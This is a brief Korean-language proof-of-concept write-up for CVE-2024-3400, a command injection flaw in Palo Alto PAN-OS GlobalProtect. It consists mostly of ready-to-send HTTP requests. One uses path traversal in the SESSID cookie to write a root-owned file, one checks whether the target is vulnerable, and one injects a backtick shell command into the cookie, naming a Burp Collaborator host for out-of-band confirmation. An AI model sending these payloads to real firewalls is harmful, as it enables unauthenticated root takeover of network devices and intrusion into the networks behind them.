
CVE-2024-3400 PAN-OS: GlobalProtect의 OS 명령 삽입 취약점
CVE-2024-3400 Palo Alto OS 명령 삽입
벤더 설명
Palo Alto Networks PAN-OS 소프트웨어의 GlobalProtect 기능에서 특정 PAN-OS 버전 및 특정 기능 구성에 대한 명령 삽입 취약점으로 인해 인증되지 않은 공격자가 방화벽에서 루트 권한으로 임의 코드를 실행할 수 있습니다.
감사합니다 watchtowr labs 🚀
HTTP 요청:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
poc.txt는 이 경로 /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx 아래에 루트 권한으로 생성되어야 합니다.
취약한 경우 poc.txt에 접근할 때 404 대신 403을 받게 됩니다.
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close
원격 측정이 활성화되어 있어야 합니다.
RCE 확인을 위해 Burp Collaborator를 사용할 수 있습니다.
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0